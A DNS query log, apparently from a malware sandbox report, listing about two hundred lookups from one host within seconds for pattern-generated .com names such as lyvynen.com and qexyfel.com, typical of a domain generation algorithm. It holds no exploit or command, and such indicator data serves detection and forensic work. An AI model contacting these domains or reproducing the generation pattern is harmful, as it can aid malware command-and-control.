                                                                                                                                                                                                            Sep 8, 2024 08:59:58.784171104 CEST192.168.2.41.1.1.10xb759Standard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.786549091 CEST192.168.2.41.1.1.10xa726Standard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.787426949 CEST192.168.2.41.1.1.10xcdf9Standard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.788440943 CEST192.168.2.41.1.1.10x9b7Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.788645983 CEST192.168.2.41.1.1.10x49f2Standard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.791394949 CEST192.168.2.41.1.1.10x264eStandard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.793926001 CEST192.168.2.41.1.1.10x6547Standard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.794574022 CEST192.168.2.41.1.1.10x6ad0Standard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.802465916 CEST192.168.2.41.1.1.10x5a6dStandard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.806516886 CEST192.168.2.41.1.1.10xbcceStandard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.811042070 CEST192.168.2.41.1.1.10x39f3Standard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.812926054 CEST192.168.2.41.1.1.10x7ec1Standard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.813493967 CEST192.168.2.41.1.1.10x6721Standard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.815409899 CEST192.168.2.41.1.1.10x6258Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.815685987 CEST192.168.2.41.1.1.10x7020Standard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.817760944 CEST192.168.2.41.1.1.10x205dStandard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.820208073 CEST192.168.2.41.1.1.10x3bc4Standard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.827785969 CEST192.168.2.41.1.1.10x1d69Standard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.829488993 CEST192.168.2.41.1.1.10x42b2Standard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.829902887 CEST192.168.2.41.1.1.10x1832Standard query (0)lyrywax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.832957983 CEST192.168.2.41.1.1.10x8a5eStandard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.835247040 CEST192.168.2.41.1.1.10xd4acStandard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.836348057 CEST192.168.2.41.1.1.10x3e9bStandard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.836852074 CEST192.168.2.41.1.1.10xd047Standard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.844888926 CEST192.168.2.41.1.1.10x45a0Standard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.845065117 CEST192.168.2.41.1.1.10x4040Standard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.845308065 CEST192.168.2.41.1.1.10xa44eStandard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.845509052 CEST192.168.2.41.1.1.10x5902Standard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.847115040 CEST192.168.2.41.1.1.10x1910Standard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.852304935 CEST192.168.2.41.1.1.10xb072Standard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.853979111 CEST192.168.2.41.1.1.10x5485Standard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.856489897 CEST192.168.2.41.1.1.10x8af0Standard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.856848955 CEST192.168.2.41.1.1.10xf9bfStandard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.857247114 CEST192.168.2.41.1.1.10x2b53Standard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.858541012 CEST192.168.2.41.1.1.10xde51Standard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.858892918 CEST192.168.2.41.1.1.10xf26aStandard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.859162092 CEST192.168.2.41.1.1.10x1524Standard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.859668016 CEST192.168.2.41.1.1.10xddc6Standard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.860861063 CEST192.168.2.41.1.1.10x6c3Standard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.336478949 CEST192.168.2.41.1.1.10xb664Standard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.336709023 CEST192.168.2.41.1.1.10x734dStandard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.337424040 CEST192.168.2.41.1.1.10xf2eaStandard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.340174913 CEST192.168.2.41.1.1.10x513eStandard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.344599009 CEST192.168.2.41.1.1.10x2e41Standard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.390568972 CEST192.168.2.41.1.1.10x9398Standard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.407099962 CEST192.168.2.41.1.1.10x5e4Standard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.408020020 CEST192.168.2.41.1.1.10x7bd5Standard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.408689976 CEST192.168.2.41.1.1.10xa332Standard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.410051107 CEST192.168.2.41.1.1.10xf4ffStandard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.413836002 CEST192.168.2.41.1.1.10x7e94Standard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.415410995 CEST192.168.2.41.1.1.10xe587Standard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.416136980 CEST192.168.2.41.1.1.10x5e0bStandard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.416744947 CEST192.168.2.41.1.1.10xacbStandard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.418862104 CEST192.168.2.41.1.1.10x1717Standard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.419569969 CEST192.168.2.41.1.1.10xab60Standard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.420211077 CEST192.168.2.41.1.1.10x5f88Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.421284914 CEST192.168.2.41.1.1.10x8e66Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.423485994 CEST192.168.2.41.1.1.10xcdbcStandard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.424999952 CEST192.168.2.41.1.1.10x123fStandard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.434317112 CEST192.168.2.41.1.1.10xa0ecStandard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.434787035 CEST192.168.2.41.1.1.10x1893Standard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435144901 CEST192.168.2.41.1.1.10xbac6Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435270071 CEST192.168.2.41.1.1.10x4012Standard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435372114 CEST192.168.2.41.1.1.10xb510Standard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435511112 CEST192.168.2.41.1.1.10x25d3Standard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435676098 CEST192.168.2.41.1.1.10x176eStandard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435825109 CEST192.168.2.41.1.1.10x2cd3Standard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435971022 CEST192.168.2.41.1.1.10xf488Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436295033 CEST192.168.2.41.1.1.10x2628Standard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436497927 CEST192.168.2.41.1.1.10x6e3eStandard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436566114 CEST192.168.2.41.1.1.10x7c96Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436726093 CEST192.168.2.41.1.1.10xc9fcStandard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436784983 CEST192.168.2.41.1.1.10x4116Standard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.437239885 CEST192.168.2.41.1.1.10x4d03Standard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.455853939 CEST192.168.2.41.1.1.10xfef1Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.456053019 CEST192.168.2.41.1.1.10xd782Standard query (0)gatyhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.456222057 CEST192.168.2.41.1.1.10xddb7Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.459121943 CEST192.168.2.41.1.1.10x1867Standard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.462091923 CEST192.168.2.41.1.1.10xb22dStandard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.462443113 CEST192.168.2.41.1.1.10x9e98Standard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.462798119 CEST192.168.2.41.1.1.10x68fdStandard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.463213921 CEST192.168.2.41.1.1.10x37c1Standard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.463685036 CEST192.168.2.41.1.1.10x2341Standard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.463977098 CEST192.168.2.41.1.1.10x5d2cStandard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.463989019 CEST192.168.2.41.1.1.10x710aStandard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464195013 CEST192.168.2.41.1.1.10xbccdStandard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464340925 CEST192.168.2.41.1.1.10x53fcStandard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464458942 CEST192.168.2.41.1.1.10xf06aStandard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464509964 CEST192.168.2.41.1.1.10xb0d9Standard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464724064 CEST192.168.2.41.1.1.10xf01fStandard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464818954 CEST192.168.2.41.1.1.10x6da5Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.465053082 CEST192.168.2.41.1.1.10xce0fStandard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.465226889 CEST192.168.2.41.1.1.10x1cb6Standard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.465718031 CEST192.168.2.41.1.1.10xa220Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.466330051 CEST192.168.2.41.1.1.10x5cb3Standard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.466564894 CEST192.168.2.41.1.1.10xb78bStandard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.466736078 CEST192.168.2.41.1.1.10x4283Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.467180967 CEST192.168.2.41.1.1.10x2254Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.467614889 CEST192.168.2.41.1.1.10xf883Standard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.478943110 CEST192.168.2.41.1.1.10xb8d1Standard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.479080915 CEST192.168.2.41.1.1.10xa591Standard query (0)qetyhyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.486285925 CEST192.168.2.41.1.1.10xf7f3Standard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.866164923 CEST192.168.2.41.1.1.10x9242Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.773371935 CEST192.168.2.41.1.1.10xe0cStandard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.773993015 CEST192.168.2.41.1.1.10x7fb5Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.774943113 CEST192.168.2.41.1.1.10x4a1Standard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.775681973 CEST192.168.2.41.1.1.10x23d9Standard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.779607058 CEST192.168.2.41.1.1.10x2da1Standard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.793544054 CEST192.168.2.41.1.1.10xd734Standard query (0)pufywil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.794034958 CEST192.168.2.41.1.1.10xeddeStandard query (0)gahykih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.795186996 CEST192.168.2.41.1.1.10x320bStandard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.799066067 CEST192.168.2.41.1.1.10xf186Standard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.810828924 CEST192.168.2.41.1.1.10x220fStandard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.814327002 CEST192.168.2.41.1.1.10xf1c0Standard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.816829920 CEST192.168.2.41.1.1.10xc3dStandard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.817306042 CEST192.168.2.41.1.1.10x4b0cStandard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.817699909 CEST192.168.2.41.1.1.10x8aaaStandard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.819593906 CEST192.168.2.41.1.1.10xf5f1Standard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.819789886 CEST192.168.2.41.1.1.10x1a53Standard query (0)qetynev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.820117950 CEST192.168.2.41.1.1.10xf10aStandard query (0)lyrynad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.821548939 CEST192.168.2.41.1.1.10x9bd8Standard query (0)ganydiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.823817015 CEST192.168.2.41.1.1.10x6eaeStandard query (0)qekylag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.824800014 CEST192.168.2.41.1.1.10xbf8aStandard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.825222969 CEST192.168.2.41.1.1.10x3b9fStandard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.825501919 CEST192.168.2.41.1.1.10x9d33Standard query (0)lyvysur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.826361895 CEST192.168.2.41.1.1.10x1e1eStandard query (0)pujylog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.826999903 CEST192.168.2.41.1.1.10x6fa1Standard query (0)qebysul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.829343081 CEST192.168.2.41.1.1.10x11bdStandard query (0)vopymyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.829411983 CEST192.168.2.41.1.1.10xf69eStandard query (0)qeqyfaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.832813025 CEST192.168.2.41.1.1.10x3215Standard query (0)qegykiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.834059000 CEST192.168.2.41.1.1.10x203bStandard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.834520102 CEST192.168.2.41.1.1.10xe1bdStandard query (0)pumydoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.835822105 CEST192.168.2.41.1.1.10x885Standard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.843535900 CEST192.168.2.41.1.1.10x7ba9Standard query (0)gaqyfah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.843806982 CEST192.168.2.41.1.1.10xaf58Standard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.844624043 CEST192.168.2.41.1.1.10xed44Standard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.844719887 CEST192.168.2.41.1.1.10x900fStandard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.845124006 CEST192.168.2.41.1.1.10xcd52Standard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.845201015 CEST192.168.2.41.1.1.10xab68Standard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.849111080 CEST192.168.2.41.1.1.10xee01Standard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.864434958 CEST192.168.2.41.1.1.10x7deaStandard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.866811991 CEST192.168.2.41.1.1.10xa7c3Standard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.872565985 CEST192.168.2.41.1.1.10x330cStandard query (0)gadyquz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.872653961 CEST192.168.2.41.1.1.10x1870Standard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.872747898 CEST192.168.2.41.1.1.10x3763Standard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.872919083 CEST192.168.2.41.1.1.10x5d5dStandard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.873066902 CEST192.168.2.41.1.1.10x8766Standard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.873076916 CEST192.168.2.41.1.1.10x77baStandard query (0)gatynes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.873291016 CEST192.168.2.41.1.1.10x3c58Standard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.873505116 CEST192.168.2.41.1.1.10x9746Standard query (0)gacypyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.873698950 CEST192.168.2.41.1.1.10x856fStandard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.874053955 CEST192.168.2.41.1.1.10x9964Standard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.874255896 CEST192.168.2.41.1.1.10x8da4Standard query (0)vojykom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.875933886 CEST192.168.2.41.1.1.10x27dbStandard query (0)vowybof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.876010895 CEST192.168.2.41.1.1.10xc725Standard query (0)puvypul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.876422882 CEST192.168.2.41.1.1.10xc959Standard query (0)vofyqit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.876719952 CEST192.168.2.41.1.1.10x2eb2Standard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.876878977 CEST192.168.2.41.1.1.10x2a08Standard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.877063036 CEST192.168.2.41.1.1.10x9234Standard query (0)lygyjuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.877083063 CEST192.168.2.41.1.1.10xa786Standard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.877249956 CEST192.168.2.41.1.1.10xceb1Standard query (0)qexytep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.877412081 CEST192.168.2.41.1.1.10xa2efStandard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.877490044 CEST192.168.2.41.1.1.10x27baStandard query (0)vocypyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.877579927 CEST192.168.2.41.1.1.10xd6d4Standard query (0)qexyxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.877739906 CEST192.168.2.41.1.1.10x9f68Standard query (0)purybav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.880024910 CEST192.168.2.41.1.1.10x8966Standard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.880140066 CEST192.168.2.41.1.1.10xc972Standard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.192337036 CEST192.168.2.41.1.1.10x8a05Standard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.193813086 CEST192.168.2.41.1.1.10x74bcStandard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.206085920 CEST192.168.2.41.1.1.10x4596Standard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.206574917 CEST192.168.2.41.1.1.10xfb5cStandard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.206878901 CEST192.168.2.41.1.1.10x5582Standard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.212455988 CEST192.168.2.41.1.1.10xc331Standard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.219118118 CEST192.168.2.41.1.1.10x8238Standard query (0)qeqysuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.220063925 CEST192.168.2.41.1.1.10x6c47Standard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.227428913 CEST192.168.2.41.1.1.10x2361Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.227490902 CEST192.168.2.41.1.1.10xb058Standard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.235975981 CEST192.168.2.41.1.1.10x36bcStandard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.241619110 CEST192.168.2.41.1.1.10xfa6cStandard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.245987892 CEST192.168.2.41.1.1.10xfa03Standard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.246211052 CEST192.168.2.41.1.1.10xaef1Standard query (0)qedyfog.comA (IP address)IN (0x0001)false
